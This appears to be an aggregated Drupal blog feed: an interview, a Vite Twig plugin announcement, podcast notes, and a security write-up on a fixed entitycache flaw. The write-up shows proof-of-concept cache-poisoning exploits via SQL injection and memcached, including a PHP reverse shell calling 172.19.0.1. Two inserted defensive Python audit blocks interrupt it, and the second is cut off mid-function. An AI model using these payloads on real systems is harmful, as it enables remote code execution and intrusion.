I do think those things are important and should get done. We've been talking about them for years. But I think that we need to figure out a way to energize the message around what Drupal truly is. And that message comes from the top, and that's how you encourage people to come back in.

And the Drupal Association is doing that now. They were at Web Summit. They're going to go to FOSS. They’ve got a new CEO, Tim Doyle, whose job is to change the messaging of Drupal and that's what needs to happen. 

And it needs to be supported from the top down of our community, and we have to have some laser focus on what we are doing as a community and what Drupal is doing as a software package in order to bring people back. And I would say they should focus on JSON:API, GraphQL and all of the sexy stuff that's out there. We're already doing it, but we're not really doing it.

4. How do you see the current state of innovation in Drupal?

There are cool things going on within Drupal, Drupal Core is constantly moving and improving. I love every bit of what they're doing. Unfortunately, the CMO and the decision maker and the marketer don’t understand that type of stuff.

And so I think the state of innovation inside Drupal could use a little kick in the butt. I do think there are things going on, but they're all focused on Twig and PHP and MySQL. And how much longer do we have with PHP, Twig and MySQL, especially in terms of talent?

As I said, when I was in DrupalCon Europe, the space where I saw innovation was inside Next.js. I saw someone starting his own company with a SaaS based version of Drupal running on Next.js. I saw another company create a killer installation profile with an automatic setup.

I saw another shop invest money in the Decoupled Search API. But I just didn't see much really cool stuff just happening in regular old Drupal, except for the cool stuff that's happening in Core, which I would definitely not deprecate. It's very cool. I love it, but why can't we improve the JSON:API output with a filter? People would love it a lot better. 

What's happening now is, people go out, they're like, Drupal is hard, so they leave, then they're like, we want to go decoupled, that might be really cool in Drupal. And then they use it as a decoupled platform and it's really hard. We need to solve the “really hard” somewhere. And I think it's pretty easy to clean up the JSON:API – but I am biased.

5. So, what do you think the future holds for Drupal? 

I think the future for Drupal holds specialization. I think that's where it's going. It's not a general product. It's a specialized product that lives inside very specific verticals like government, education, nonprofit, healthcare.

And I feel as though specialization is the differentiator that's going to be in the future for us when we know we need to get off the islands. We've been on the Drupal Island now for 20 years. We need to expand out. I think the Drupal Association agrees with that and has plans for that.

6. Besides Next-Drupal, are there any other contributions from Chapter Three that you are really proud of and would like to highlight?

Well, I love our Next.js contribution. I also love the work that we did in Drupal 8. We really inspired other companies to hire core maintainers. We hired Alex Pott for almost two years to help us get Drupal 8 over the finish line.

And we sort of set a model of paying someone a full salary and let them just work on Core and things get done. So I'm super proud of that because I feel like there are other companies now that are modeling that behavior. I know that Catch is employed, for example, and so I know that there are other people doing it, they see the benefit of that.

We also support 90 projects and have about 7,700 commits on Drupal Core right now. So that's quite large. I'm super proud of all of that work that we've given back. 

And then another one that I'm super proud of is our Apigee Developer Portal project, which is sort of under the covers. A lot of people haven't heard about it, but the Apigee Dev Portal is very cool and it's exposing Drupal to the really big stakeholders in their tech departments and they're seeing the value of it. 

I'm just generally super proud of Chapter Three, the way that our company operates and the fact that our company has been around for almost 17 years and really holds the same ethos and values as when it first started, which is: we're a cool company. We like doing cool stuff. We respect our employees. And I'm super proud of the fact that we've been able to keep that alive for so long.

Nov 27 2023

We're proud to announce the release of vite-plugin-twig-drupal, a plugin for Vite that we hope will improve your workflow for front-end development with Drupal.

The problem space

  • You're working with Twig in a styleguide-driven-development process.
  • You're writing isolated components that consist of CSS, Twig and JavaScript.
  • You want to be able to use Twig to render your components for Storybook.
  • You want fast refresh with Vite.
  • You want Twig embeds, includes and extends to work.
  • You want to use Drupal-specific twig features like create_attributes etc.
  • You want compilation of PostCSS and SASS to CSS.
  • You want Hot Module Reloading (HMR) so that you can see how your components look without needing to endlessly refresh.

Enter vite-plugin-twig-drupal

The Vite plugin Twig Drupal is a Vite plugin based on Twig JS for compiling Twig-based components into a JavaScript function so that they can be used as components with Storybook. It allows you to import Twig files into your story as though they are JavaScript files.

Comparison to other solutions

  • Vite plugin twig loader doesn't handle nested includes/embeds/extends. These are a fairly crucial feature of Twig when building a component library as they allow re-use and DRY principles.
  • Components library server requires you to have a running Drupal site. Whilst this ensures your Twig output is identical to that of Drupal (because Drupal is doing the rendering), it is a bit more involved to set up. If you're going to use single directory components or a similar Drupal module like UI patterns then this may be a better option for you.

Installation

This module is distributed via npm, which is bundled with node and should be installed as one of your project's devDependencies:

npm install --save-dev vite-plugin-twig-drupal

You then need to configure your vite.config.js.

import { defineConfig } from "vite"
import twig from 'vite-plugin-twig-drupal';
import { join } from "node:path"
export default defineConfig({
  plugins: [
    // Other vite plugins.
    twig({
      namespaces: {
        components: join(__dirname, "/path/to/your/components"),
        // Other namespaces as required.
      },
      // Optional if you are using React storybook renderer. The default is 'html' and works with storybook's html
      // renderer.
      // framework: 'react' 
    }),
    // Other vite plugins.
  ],
})

With this config in place, you should be able to import Twig files into your story files.

Examples

To make use of a Twig file as a Storybook component, just import it. The result is a component you can pass to Storybook or use as a function for more complex stories.

// stories/Button.stories.js
// Button will be a Javascript function that accepts variables for the twig template.
import Button from './button.twig';
// Import stylesheets, this could be a sass or postcss file too.
import './path/to/button.css';
// You may also have JavaScript for the component.
import './path/to/some/javascript/button.js';
export default {
  title: 'Components/Button',
  tags: ['autodocs'],
  argTypes: {
    title: {
      control: { type: 'text' },
    },
    modifier: {
      control: { type: 'select' },
      options: ['primary', 'secondary', 'tertiary'],
    },
  },
  // Just pass along the imported variable.
  component: Button,
};
// Set default variables in the story.
export const Default = {
  args: { title: 'Click me' },
};
export const Primary = {
  args: { title: 'Click me', modifier: 'primary' },
};
// Advanced example.
export const ButtonStrip = {
  name: 'Button group',
  render: () => `
    ${Button({title: 'Button 1', modifier: 'primary'})} 
    ${Button({title: 'Button 2', modifier: 'secondary'})}
  `
}

Here's how that might look in Storybook (example from the Admin UI Initiative storybook)

Screenshot of a button in storybook

Dealing with Drupal.behaviors

In cases where the JavaScript you import into your story file uses a Drupal behavior, you'll likely need some additional code in your Storybook configuration to handle firing the behaviors. Here at PreviousNext, we prefer to use a loadOnReady wrapper, which works with and without Drupal. However, if you're just using Drupal.behaviors, something like this in your Storybook config in main.js (or main.ts) will handle firing the behaviors.

const config = {
  // ... existing config
  previewBody: (body) => `
    
  ${body}
  `
  // ... more config
}

Give it a try

We're looking forward to using this plugin in client projects and are excited about the other possibilities Storybook provides us with, such as interaction and accessibility testing.

Thanks to early testers in the community, such as Ivan Berdinsky and Sean Blommaert, who've already submitted some issues to the GitHub queue. We're really happy to see it in use in the Admin Initiative's work on a new toolbar.

Give it a try, and let us know what you think.

Nov 27 2023

Today we are talking about The Needs Review Queue Initiative, What it is, and How it’s helping to improve Drupal with guest Stephen Mustgrave. We’ll also cover Translation Management Tool as our module of the week.

For show notes visit:
www.talkingDrupal.com/426

Topics

  • Can you give an overview of Needs Review Issue Queue Initiative
  • Is the bug smash initiative related to the needs review issue queue
  • Is this the same as the needs review bot
  • How many issues were in the Needs Review status when you started
  • How many issues today
  • How long did it take until it was manageable
  • How long do items stay on average
  • Who else is helping
  • Let’s talk through the pagination heading level issue
  • What help can the community provide
  • How does someone get involved
  • Do you think this helps with burnout for core committers
  • What’s the future of the initiative

Resources

Guests

Stephen Mustgrave - smustgrave

Hosts

Nic Laflin - nLighteneddevelopment.com nicxvan
John Picozzi - epam.com johnpicozzi
Melissa Bent - linkedin.com/in/melissabent merauluka

MOTW

Correspondent

Martin Anderson-Clutz - @mandclu
Translation Management Tool (TMGMT)

  • Brief description:
    • Have you ever wanted to automate the process of creating content translations on your Drupal site? There’s a module for that.
  • Brief history
    • How old: created in Jan 2012
    • Versions available: 7.x-1.0-rc3 and 8.x-1.15, the latter of which works with Drupal 9 and 10
  • Maintainership
    • Actively maintained
    • Test coverage
    • Documentation
    • Number of open issues: 595, 139 of which are bugs against the 8.x branch
  • Usage stats:
    • 8,766 sites
  • Maintainer(s):
    • Berdir, a very prolific maintainer in his own right, who also supports well known projects like Search API, Token, Paragraphs, and many more
  • Module features and usage
    • Provides a tool set for automating the process of creating translations for your site content, as well as strings used within the site like menus, interface text, and so on
    • Also has a plugin system to determine what text needs to be translated, so it can be easily adapted to very custom needs
    • With the module installed, the Translate tab on your nodes changes to have buttons to request a translation in each language
    • Once a translation has been requested, it will run through states like unprocessed, active, and finished
    • Also provides an option for Continuous Translation, where new and updated content is automatically submitted for translation
    • Allows for professional translation at scale, using whatever kind of service works best for your site
    • The need for robust translation capabilities is what originally got me started using Drupal, so it’s great to see that there are enterprise-grade options for sites that need to manage translations at scale
Nov 27 2023

PHP's create_function() was:

DEPRECATED as of PHP 7.2.0, and REMOVED as of PHP 8.0.0

As the docs say, its use is highly discouraged.

PHP 7 is no longer supported by the upstream developers, but it'll still be around for a while longer (because, for example, popular Linux distributions provide support for years beyond the upstream End of Life).

Several years ago I stumbled across a usage of create_function in the entitycache module which was open to abuse in quite an interesting way.

The route to exploitation requires there to be a security problem already, so the Drupal Security Team agreed there was no need to issue a Security Advisory.

The module has removed the problematic code so this should not be a problem any more for sites that are staying up-to-date.

This is quite a fun vulnerability though, so let's look at how it might be exploited given the right (or should that be "wrong"?) conditions.

To be clear, we're talking about Drupal 7 and (probably) drush 8. The latest releases of both are now into double digits.

Is it unsafe input?

Interestingly, the issue is in a drush-specific inc file:

/**
 * Implements hook_drush_cache_clear().
 */
function entitycache_drush_cache_clear(&$types) {
  $entities = entity_get_info();
  foreach ($entities as $type => $info) {
    if (isset($info['entity cache']) && $info['entity cache']) {
      // You can't pass paramters to the callbacks in $types, so create an
      // anonymous function for each specific bin.
      $lamdba = create_function('', "return cache_clear_all('*', 'cache_entity_" . $type . "', TRUE);");
      $types['entitycache-' . str_replace('_', '-', $type)] = $lamdba;
    }
  }
}

https://git.drupalcode.org/project/entitycache/-/blob/7.x-1.5/entitycach...

Let's remind ourselves of the problem with create_function(); essentially it works in a very similar way to calling eval() on the second $code parameter.

So - as is often the case - it's very risky to pass unsafe user input to it.

In this case, we might not even consider the $type variable to be user input; it comes from the array keys returned by entity_get_info().

Is there really a problem here? Well only if an attacker were able to inject something into those array keys. How might that happen?

entity_cache_info() uses a cache to minimise calls to implementations of hook_entity_info.

If an attacker is able to inject something malicious into that cache, there could be a path to Remote Code Execution here.

Let's just reiterate that this is a big "IF"; an attacker having the ability to inject things into cache is obviously already a pretty significant problem in the first place.

How might that come about? Perhaps the most obvious case would be a SQL Injection (SQLi) vulnerability. Assuming a site keeps its default cache bin in the database, a SQLi vulnerability might allow an attacker to inject their payload. We can look more closely at how that might work, but note that the entitycache project page says:

Don't bother using this module if you're not also going to use http://drupal.org/project/memcache or http://drupal.org/project/redis - the purpose of entitycache is to allow queries to be offloaded from the database onto alternative storage. There are minimal, if any, gains from using it with the default database cache.

So perhaps it's not that likely that a site using entitycache would have its cache bins in the database.

We'll also look at how an attacker might use memcache as an attack vector.

Proof of Concept

To keep things simple initially, we'll look at conducting the attack via SQL.

Regardless of what technology the victim site is using for caching, the attack needs to achieve a few objectives.

As we consider those, keep in mind that the vulnerable code is within an implementation of hook_drush_cache_clear, so it will only run if and when caches are cleared via drush.

Objectives

  • The malicious payload has to be injected into the array keys of the cached data returned by entity_cache_info().
  • The injection cannot break Drupal so badly that drush cannot run a cache clear.
  • However, the attacker may wish to deliberately break the site sufficiently that somebody will attempt to remedy the problem by clearing caches (insert "keep calm and clear cache" meme here!).

The relevant cache item here is:

$cache = cache_get("entity_info:$langcode")

https://git.drupalcode.org/project/drupal/-/blob/7.98/includes/common.in...

The simplest possible form of attack might be to try to inject a very simple array into that cache item, with the payload in an array key. For example:

array('malicious payload' => 'foo');

Let's look at what we'd need to do to inject this array into the site's cache so that this is what entity_cache_info() will return.

The simplest way to do this is to use a test Drupal 7 site and the cache API. Note that we're highly likely to break the D7 site along the way.

We can use drush to run some simple code that stores our array into the cache:

$ drush php
 
>>> $entity_info = array('malicious payload' => 'foo');
=> [
     "malicious payload" => "foo",
   ]
 
>>> cache_set('entity_info:en', $entity_info);

Now let's look at the cache item in the db:

$ drush sqlc
 
> SELECT * FROM cache WHERE cid = 'entity_info:en';
+----------------+-------------------------------------------+--------+------------+------------+
| cid            | data                                      | expire | created    | serialized |
+----------------+-------------------------------------------+--------+------------+------------+
| entity_info:en | a:1:{s:17:"malicious payload";s:3:"foo";} |      0 | 1696593295 |          1 |
+----------------+-------------------------------------------+--------+------------+------------+

Okay, that's pretty simple; we can see that the array was serialized. (Of course the fact that the cache API will unserialize this data may lead to other attack vectors if there's a suitable gadget chain available, but we'll ignore that for now.)

How is the site doing now? Let's try a drush status:

$ drush st
 
Error: Class name must be a valid object or a string in entity_get_controller() (line 8216 of /var/www/html/includes/common.inc).
 
Drush was not able to start (bootstrap) Drupal.  
Hint: This error can only occur once the database connection has already been successfully initiated, therefore this error generally points to a site configuration issue, and not a problem connecting to the database.

That's not so great, and importantly we get the same error when we try to clear caches by running drush cc all.

We've broken the site so badly that drush cannot bootstrap Drupal sufficiently to run a cache clear, so we've failed to meet the objectives.

The site can be restored by manually removing the injected cache item, but this means the attack was unsuccessful.

It seems we need to be a bit more surgical when injecting the payload into this cache item, as Drupal's bootstrap relies on being able to load some valid information from it.

We could just take the valid default value for this cache item and inject the malicious payload on top of that, but it's quite a lot of serialized data (over 13kb on a vanilla D7 install) and is therefore quite cumbersome to manipulate.

Through a process of trial and error, using Xdebug to step through the code, we can derive some minimal valid data that needs to be present in the cache item for drush to be able to bootstrap Drupal far enough to run a cache clear.

It's mostly the user entity that needs to be somewhat intact, but there's also a dependency on the file entity that requires a vaguely valid array structure to be in place.

Here's an example of a minimal array that we can use for the injection that allows a sufficiently full bootstrap:

$entity_info['user'] = [                                                           
  'controller class' => 'EntityCacheUserController',                               
  'base table' => 'users',                                                         
  'entity keys' => ['id' => 'uid'],                                                
  'schema_fields_sql' => ['base table' => ['uid']],                                
  'entity cache' => TRUE,                                                          
];                                                                                 
 
$entity_info = [                                                                   
  'user' => $entity_info['user'],                                                  
  'file' => $entity_info['user'],                                                  
  'malicious payload' => $entity_info['user']
];

Note that it seems only the user entity really needs the correct entity controller and db information, so we can reuse some of the skeleton data. It may be possible to trim this back further.

Let's try injecting that into the cache via drush php and then checking whether drush is still functional.

It's convenient to put the injection code into a script so we can iterate on it easily - the $entity_info array is the same as the code snippet above.

$ cat cache_injection.php
<?php
 
$entity_info['user'] = [
  'controller class' => 'EntityCacheUserController',
  'base table' => 'users',
  'entity keys' => ['id' => 'uid'],
  'schema_fields_sql' => ['base table' => ['uid']],
  'entity cache' => TRUE,
];
 
$entity_info = [
  'user' => $entity_info['user'],
  'file' => $entity_info['user'],
  'malicious payload' => $entity_info['user']
];
 
cache_set('entity_info:en', $entity_info);
 
$ drush scr cache_injection.php
 
$ drush st
 Drupal version                  :  7.99-dev
 
...snip - no errors...
 
$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => user
    [1] => file
    [2] => malicious payload
)

We can successfully run drush cc all with this in place, but all that this achieves is blowing away our injected payload and replacing it with clean values generated by hook_entity_info.

$ drush cc all
'all' cache was cleared.
 
$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => comment
    [1] => node
    [2] => file
    [3] => taxonomy_term
    [4] => taxonomy_vocabulary
    [5] => user
)

We're making progress though.

Let's try putting an actual payload into the array key in our script:

$ tail -n7 cache_injection.php 
 
$entity_info = [
  'user' => $entity_info['user'],
  'file' => $entity_info['user'],
  'foo\', TRUE);} echo "code execution successful"; //' => $entity_info['user']                                      
]; 
 
cache_set('entity_info:en', $entity_info);
 
$ drush scr cache_injection.php
 
$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => user
    [1] => file
    [2] => foo', TRUE);} echo "code execution successful"; //
)
 
$ drush cc all
code execution successfulcode execution successful'all' cache was cleared.

Great, so it's not very pretty but we've achieved code execution when the cache was cleared via drush.

A real attacker would no doubt want to do a bit more than just printing messages. As is often the case, escaping certain characters can be a bit tricky but you can squeeze quite a useful payload into the array key.

Having said we've achieved code execution, so far we got there by running PHP code through drush. If an attacker could do this, they don't really need to mess around with injecting payloads into the caches.

Let's work backwards now and see how this attack might work with more limited access whereby injecting data into the cache is all we can do.

Attack via SQLi

If we re-run the injection script but don't clear caches, we can look in the db to see what ended up in cache.

$ drush sqlq 'SELECT data FROM cache WHERE cid = "entity_info:en";'
 
a:3:{s:4:"user";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}s:4:"file";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}s:50:"foo', TRUE);} echo "code execution successful"; //";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}}

This is not very pretty to look at, but we can see our array has been serialized.

If we have a SQLi vulnerability to play with, it's not hard to inject this payload straight into the db.

To simulate using a payload in a SQLi attack we could store the data in a file then send it to the db in a query. We'll empty out the cache table first to prove that it's our injected payload achieving execution.

After wiping the cache manually like this, we'll call drush status to repopulate the cache with valid entries. This means we can use an UPDATE statement (as opposed to doing an INSERT if the caches are initially empty), which is a more realistic simulation of attacking a production site.

Note also that we have to ensure that any quotes in our payload are escaped appropriately, and that we don't have any newlines in the middle of our SQL statement.

I often think fiddly things like this are the hardest part of developing these PoC exploits!

# inject the payload using a drush script
$ drush scr cache_injection.php
 
# extract the payload into a SQL statement stored in a file
$ echo -n "UPDATE cache SET data = '" > sqli.txt
$ drush sqlq 'SELECT data FROM cache WHERE cid = "entity_info:en";' | sed "s#'#\\\\'#g" | tr -d "\n" >> sqli.txt
$ echo "' WHERE cid = 'entity_info:en';" >> sqli.txt
 
# empty the cache table, and repopulate it with valid entries
$ drush sqlq 'DELETE FROM cache;'
$ drush st
 
# inject the payload, simulating SQLi
$ cat sqli.txt | drush sqlc
 
# execute the attack
$ drush cc all
code execution successful ...

So we've now developed a single SQL statement that could be run via SQLi which will result in RCE when drush cc all is run on the victim site.

In an actual attack, the payload would be prepared on a separate test site and the injection would only happen via SQLi on the victim site.

However, as mentioned previously it's perhaps unlikely that a site using the entitycache module would be keeping its caches in the database.
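
From the defender's side, the same cache row can be checked before anyone clears caches. The following Python is an added example, not code from the original post or from the entitycache project: it parses the serialized data value of the entity_info:en row (as printed by the drush sqlq query above) and reports top-level array keys that are not plain machine names. The machine-name pattern, the function names and the sample rows are assumptions made for this example.

```python
import re

# Assumption: entity type names are lowercase machine names. Anything else in a
# top-level key of the cached entity info deserves a closer look.
MACHINE_NAME = re.compile(rb"[a-z0-9_]+")


def _read_until(buf, pos, delim):
    """Return (bytes before delim, offset just past delim)."""
    end = buf.index(delim, pos)  # raises ValueError when delim is missing
    return buf[pos:end], end + len(delim)


def parse_value(buf, pos=0):
    """Parse one PHP-serialized value at pos; return (value, next offset).

    Handles the types seen in the cache row shown above: null, bool, int,
    float, string and array. Arrays become lists of (key, value) pairs.
    Objects and references raise ValueError instead of being guessed at.
    """
    kind = buf[pos:pos + 1]
    if kind == b"N" and buf[pos + 1:pos + 2] == b";":
        return None, pos + 2
    if kind not in (b"b", b"i", b"d", b"s", b"a") or buf[pos + 1:pos + 2] != b":":
        raise ValueError("unsupported token %r at offset %d" % (kind, pos))
    if kind in (b"b", b"i", b"d"):
        raw, nxt = _read_until(buf, pos + 2, b";")
        if kind == b"b":
            return raw == b"1", nxt
        return (int(raw) if kind == b"i" else float(raw)), nxt
    raw_len, nxt = _read_until(buf, pos + 2, b":")
    count = int(raw_len)
    if count < 0:
        raise ValueError("negative length at offset %d" % pos)
    if kind == b"s":
        # Strings are s:<byte length>:"<bytes>"; and may contain quotes or
        # semicolons, so slice by the declared length and never scan for '"'.
        start, end = nxt + 1, nxt + 1 + count
        if buf[nxt:start] != b'"' or buf[end:end + 2] != b'";':
            raise ValueError("string length mismatch at offset %d" % pos)
        return buf[start:end], end + 2
    # kind == b"a": a:<count>:{<key><value>...}
    if buf[nxt:nxt + 1] != b"{":
        raise ValueError("expected '{' at offset %d" % nxt)
    nxt += 1
    items = []
    for _ in range(count):
        key, nxt = parse_value(buf, nxt)
        value, nxt = parse_value(buf, nxt)
        items.append((key, value))
    if buf[nxt:nxt + 1] != b"}":
        raise ValueError("expected '}' at offset %d" % nxt)
    return items, nxt + 1


def audit_entity_info(data):
    """Return the suspect top-level keys of a cached entity_info row.

    An empty list means every key looks like a machine name. A row that does
    not parse cleanly is reported too, since a tampered row may be malformed.
    Trailing newlines (as added by command-line output) are ignored.
    """
    data = data.rstrip(b"\r\n")
    try:
        value, end = parse_value(data)
    except (ValueError, RecursionError) as exc:
        return ["<unparseable: %s>" % exc]
    if not isinstance(value, list) or end != len(data):
        return ["<unexpected structure>"]
    suspect = []
    for key, _ in value:
        if isinstance(key, bytes) and MACHINE_NAME.fullmatch(key):
            continue
        suspect.append(key.decode("utf-8", "replace") if isinstance(key, bytes) else str(key))
    return suspect


# Sample rows. FROM_PAGE is the first row printed earlier in this post; the
# other three are constructed for this example.
CLEAN = b'a:2:{s:4:"node";a:1:{s:12:"entity cache";b:1;}s:4:"user";a:1:{s:12:"entity cache";b:1;}}'
FROM_PAGE = b'a:1:{s:17:"malicious payload";s:3:"foo";}'
QUOTED_KEY = b'a:2:{s:4:"user";a:0:{}s:4:"a";b";a:0:{}}'
BAD_LENGTH = b'a:1:{s:5:"user";b:1;}'

if __name__ == "__main__":
    for name, row in [("clean", CLEAN), ("from page", FROM_PAGE),
                      ("quoted key", QUOTED_KEY), ("bad length", BAD_LENGTH)]:
        print(name, "->", audit_entity_info(row))
```

A non-empty result is a reason to inspect the row before running drush cc all on a site that still has the old entitycache code.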

Attack via memcache

How about if the caches are in memcache; what might an attack look like then?

First we're going to assume that the attacker has network access to the memcached daemon. Hopefully this is quite unlikely in real life, but it's not impossible.

The objective of the attack will be exactly the same in that we want to inject a malicious payload into the array keys of the data cached for entity info.

The mechanics of how we might do so are a little different with a "memcache injection" though.

The Drupal memcache module (optionally) uses a key prefix to "namespace" cache items for a given site, which allows multiple applications to share the same memcached instance (and such a shared instance is one scenario in which this attack might take place).

In order to be able to inject a payload into a specific cache item, the attacker would need to find out what prefix is in use for the target site.

Here's an example of issuing a couple of commands over the network to a memcached instance in order to find out what the cache keys look like:

$ echo "stats slabs" | nc memcached 11211 | head -n2
STAT 2:chunk_size 120
STAT 2:chunks_per_page 8738
 
$ echo "stats cachedump 2 2" | nc memcached 11211 | head -n2
ITEM dd_d7-cache-.wildcard-node_types%3A [1 b; 0 s]
ITEM dd_d7-cache-.wildcard-entity_info%3A [1 b; 0 s]

This shows us that there's a Drupal site using a key prefix of dd_d7. A large site may be using multiple memcached slabs and this enumeration step may be a bit more complex.

So in this case the cache item we're looking to attack will have the key dd_d7-cache-entity_info%3Aen.

We can go through a very similar exercise to what we did with the SQL caches; using a test site to inject the minimal data structure we want into the cache, then extracting it to see exactly what it looks like when stored in a memcache key/value pair.

There are a couple of small complications we're likely to encounter with this workflow.

One of those is that Drupal typically uses compression by default in memcache. This is generally a good thing, but makes it harder to extract the payload we want to inject in plain text that's easy to manipulate.

If you've ever output a zip file or compressed web page in your terminal and ended up with a screen full of gobbledygook, that's the sort of thing that'll happen if you try to retrieve a compressed item directly from memcached.

We can get around this by disabling compression on our test site.

Another potential problem is that the memcache integration works a bit differently to database cache when it comes to expiry of items. By default, memcache won't return items once their expiry timestamp has passed, whereas the database cache will return stale items (for a while at least).

This means that if an attacker prepares a payload for memcache but leaves the expiry timestamp intact, it's possible that the item will already be expired by the time the payload is injected into the target site, and the attack will not work.

It's not too hard to get around this by setting a fake timestamp that should avoid expiry. Note that there are at least two different types of expiry at play here; memcache itself has an expiry time, and Drupal's cache API has its own on top of this.

There's also the concept of cache flushes in Drupal memcache. It's out of scope to go into too much detail about that here, but the tl;dr is that the memcache module keeps track of when caches are flushed and tries not to return items that were stored before any such flush. An attack has more chance of succeeding if it also tries to ensure that the injected cache item doesn't fall foul of this as it'd then be treated as outdated and not returned.

Injecting an item into memcache will typically mean using the SET command.

The syntax for this command includes a flags parameter which is "opaque to the server" but is used by the PHP memcached extension to determine whether a cache item is compressed. This means that even if a site is using compression by default, an attacker can inject an uncompressed item and the application will not know the difference; the PHP integration handles the compression (or lack thereof).

Part of the syntax also tells the server how many bytes of data are about to be transmitted following the initial SET instruction. This means that if we manipulate the data we want to store in memcache, we have to ensure that the byte count remains correct.

We also need to ensure that the PHP serialized data remains consistent; for example if we change an IP address we need to ensure that the string it's within still has the correct length e.g. s:80:\"foo' ...

Putting all of that together, and jumping through some more hoops to ensure that quotes are appropriately escaped, we might end up with something like the below:

$ echo -e -n "set dd_d7-cache-entity_info%3Aen 4 0 978\r\nO:8:\"stdClass\":6:{s:3:\"cid\";s:14:\"entity_info:en\";s:4:\"data\";a:3:{s:4:\"user\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}s:4:\"file\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}s:80:\"foo', TRUE);}\$s=fsockopen(\"172.19.0.1\",1337);\$p=proc_open(\"sh\",[\$s,\$s,\$s],\$i);//\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}}s:7:\"created\";i:TIMESTAMP;s:17:\"created_microtime\";d:TIMESTAMP.2850001;s:6:\"expire\";i:0;s:7:\"flushes\";i:999;}\r\n" | sed "s/TIMESTAMP/9999999999/g" | nc memcached 11211

This should successfully inject a PHP reverse shell into the array keys, which gets executed when drush cc all is run and the vulnerable code passes each array key to create_function().

$ ./poison_entity_info.sh  # this script contains the memcache set command above
STORED
 
$ drush ev 'print_r(array_keys(entity_get_info()));'
  Array
  (
      [0] => user
      [1] => file
      [2] => foo', TRUE);}$s=fsockopen("172.19.0.1",1337);$p=proc_open("sh",[$s,$s,$s],$i);//
  )
 
$ drush cc all
'all' cache was cleared.

Meanwhile in the attacker's terminal...

$ nc -nvlp 1337
Listening on 0.0.0.0 1337
 
Connection received on 172.19.0.3 58220
 
python -c 'import pty; pty.spawn("/bin/bash")'
 
mcdruid @ drupal-7:/var/www/html$ head -n2 CHANGELOG.txt
Drupal 7.xx, xxxx-xx-xx (development version)
-----------------------

We successfully popped an interactive reverse shell from the victim system when the drush cache clear command was run.

One final step in this attack might be to deliberately break the site just enough that the administrator will manually clear the caches to try to rectify the problem, but not so badly that clearing the caches with drush will not work.

Perhaps the injection into the entity_info cache item already achieves that goal?

Could this attack also be carried out via Redis? Probably.

I'm sharing the details of this attack scenario because I think it's an interesting one, and because well maintained sites should not be affected. In order to be exploitable the victim site has to be running an outdated version of the entitycache module, on PHP<8, and most importantly has to be vulnerable (or at least exposed) in quite a serious way; if an attacker can inject arbitrary data into a site's caches, they can do all sorts of bad things.

As always, the best advice for anyone concerned about their site(s) being vulnerable is to keep everything up-to-date; the latest releases of the entitycache module no longer call create_function().
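A defender-side check for the poisoning described above, as an added example that is not part of the original post: it decodes an uncompressed entity_info cache item without instantiating anything, then flags array keys that are not plain machine names and a created timestamp set in the future. The machine-name pattern, the 300-second skew, the function names and the sample items are assumptions constructed for the illustration.

```python
import re

# Assumption: legitimate entity type keys are lowercase machine names.
MACHINE_NAME = re.compile(r"[a-z0-9_]+")


def parse_php(buf, pos=0):
    """Decode one PHP-serialized value at buf[pos]; return (value, next_pos).

    Objects come back as plain dicts, so nothing is ever instantiated.
    String lengths are byte counts, which is why this works on bytes.
    """
    tag = buf[pos:pos + 1]
    if tag == b"N":
        return None, pos + 2
    if tag in (b"i", b"d", b"b"):
        end = buf.index(b";", pos)
        text = buf[pos + 2:end].decode("ascii")
        if tag == b"d":
            return float(text), end + 1
        return (int(text) != 0 if tag == b"b" else int(text)), end + 1
    if tag == b"s":
        colon = buf.index(b":", pos + 2)
        start = colon + 2
        end = start + int(buf[pos + 2:colon])
        if buf[end:end + 2] != b'";':
            raise ValueError("declared string length does not match data")
        return buf[start:end].decode("utf-8", "replace"), end + 2
    if tag in (b"a", b"O"):
        count_at = pos + 2
        if tag == b"O":  # skip O:<len>:"ClassName": to reach the member count
            colon = buf.index(b":", pos + 2)
            count_at = colon + 2 + int(buf[pos + 2:colon]) + 2
        brace = buf.index(b":", count_at) + 1
        count = int(buf[count_at:brace - 1])
        if buf[brace:brace + 1] != b"{":
            raise ValueError("malformed array/object header")
        pos, out = brace + 1, {}
        for _ in range(count):
            key, pos = parse_php(buf, pos)
            out[key], pos = parse_php(buf, pos)
        if buf[pos:pos + 1] != b"}":
            raise ValueError("array/object not closed where expected")
        return out, pos + 1
    raise ValueError("unsupported type tag %r" % tag)


def audit_entity_info(raw, now):
    """Return a list of findings for one serialized entity_info cache item."""
    try:
        item, _ = parse_php(raw)
    except (ValueError, TypeError) as exc:
        return ["unparseable cache item: %s" % exc]
    data = item.get("data") if isinstance(item, dict) else None
    if not isinstance(data, dict):
        return ["cache item has no entity info array in 'data'"]
    findings = []
    for key in data:
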